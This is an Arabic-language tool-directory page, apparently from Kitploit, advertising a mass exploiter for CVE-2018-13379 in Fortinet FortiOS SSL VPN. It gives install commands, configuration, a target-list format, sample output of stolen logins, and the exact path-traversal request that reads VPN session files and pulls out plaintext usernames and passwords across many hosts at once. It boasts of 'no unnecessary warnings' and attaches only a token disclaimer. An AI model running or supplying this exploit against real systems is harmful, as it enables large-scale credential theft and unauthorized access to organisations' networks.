Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Multi-threaded-mass-exploiter-CVE-2018-13379-POC — CVE-2018-13379 أداة استغلال جماعية لـ Fortinet FortiOS SSL VPN. تستخرج بيانات الاعتماد فورًا، وتحفظها إلى CSV + PostgreSQL. متعددة الخيوط، بدون تحذيرات غير ضرورية. | Kitploit
أدوات/GitHubGitHub/instructor-admin/multi-threaded-mass-exploiter-cve-2018-13379-poc
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHubinstructor-admin/multi-threaded-mass-exploiter-cve-2018-13379-poc

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Multi-threaded-mass-exploiter-CVE-2018-13379-POC

CVE-2018-13379 أداة استغلال جماعية لـ Fortinet FortiOS SSL VPN. تستخرج بيانات الاعتماد فورًا، وتحفظها إلى CSV + PostgreSQL. متعددة الخيوط، بدون تحذيرات غير ضرورية.

عرض المستودع
12منذ 3 أشهرلم تتم المراجعة بعد

معاينة

CVE-2018-13379 — استغلال جماعي لثغرة Fortinet FortiOS SSL VPN

أداة للاستغلال الجماعي لثغرة CVE-2018-13379 (عبور المسار) في Fortinet FortiOS SSL VPN. تسمح بقراءة ملفات الجلسات واستخراج أسماء المستخدمين وكلمات المرور بنص واضح.

الميزات

  • استغلال CVE-2018-13379 عبر نقطة النهاية /remote/fgt_lang
  • تعدد الخيوط (20 خيطًا افتراضيًا)
  • حفظ فوري لبيانات الاعتماد المُكتشفة في CSV و PostgreSQL
  • أسماء جداول ديناميكية في PostgreSQL مع طابع زمني (fortios_creds_20250120_143052)
  • لا تحذيرات - فقط النتائج

التثبيت

root@kitploit:~
git clone https://github.com/Instructor-Admin/Multi-threaded-mass-exploiter-CVE-2018-13379-POC.git
cd Multi-threaded-mass-exploiter-CVE-2018-13379-POC
pip3 install requests psycopg2-binary

الإعداد

جميع الإعدادات قابلة للتعديل مباشرةً داخل السكريبت - لا داعي للعبث بوسائط سطر الأوامر:

root@kitploit:~
TARGETS_FILE = "targets.txt" # ملف الأهداف (ip:port)
CSV_FILE = "fortios_creds.csv" # ملف CSV للإخراج

PostgreSQL (اختياري - السكريبت يعمل بدون قاعدة بيانات)

root@kitploit:~
PG_HOST = "127.0.0.1"
PG_PORT = 5432
PG_DB = "fortios_db"
PG_USER = "postgres"
PG_PASSWORD = "password"
THREADS = 20
TIMEOUT = 8

الاستخدام

  1. أنشئ ملفًا باسم targets.txt يحتوي على الأهداف، هدف واحد في كل سطر:
root@kitploit:~
192.168.1.1:8443
10.0.0.5:10443
172.16.0.1:443
  1. شغّل السكريبت:
root@kitploit:~
python3 exploit.py

النتائج

  • ملف CSV — جميع بيانات الاعتماد المُكتشفة مع الطوابع الزمنية
  • جدول PostgreSQL — يتم إنشاء جدول جديد في كل تشغيل (fortios_creds_YYYYMMDD_HHMMSS)

مثال على الإخراج:

root@kitploit:~
[+] تم تحميل 100 هدف. نعمل بـ 20 خيطًا...
[+] تسريب: 192.168.1.1:8443
→ جلب 3 بيانات اعتماد
تمت كتابة 3 بيانات اعتماد إلى CSV
تم إدخال 3 بيانات اعتماد في قاعدة البيانات
[-] لا تسريب: 10.0.0.1:10443

آلية العمل

  1. يتم إرسال طلب GET إلى العنوان https://ip:port/remote/fgt_lang?lang=/../../../..///////////dev/cmdb/sslvpn_websession
  2. يُفحص الرد لمعرفة ما إذا كان يحتوي على السلسلة var fgt_lang (علامة على وجود الثغرة)
  3. يتم استخراج أزواج username و password من الرد الثنائي
  4. تُحفظ البيانات المُكتشفة فورًا في CSV و PostgreSQL
  5. ينتقل السكريبت إلى الهدف التالي.

المتطلبات

  • Python 3.6+
  • requests
  • psycopg2-binary (اختياري - بدونها يعمل فقط مع ملفات CSV)
  • urllib3

تحذير

هذه الأداة مخصصة للأغراض التعليمية والاختبار المُصرَّح به. أنت مسؤول عن أفعالك.

شكر وتقدير

  • الثغرة الأصلية اكتشفها Meh Chang
  • منطق الاستغلال مبني على أبحاث متاحة للعموم

الترخيص

Unlicense - افعل ما تشاء.

تنزيل الأداة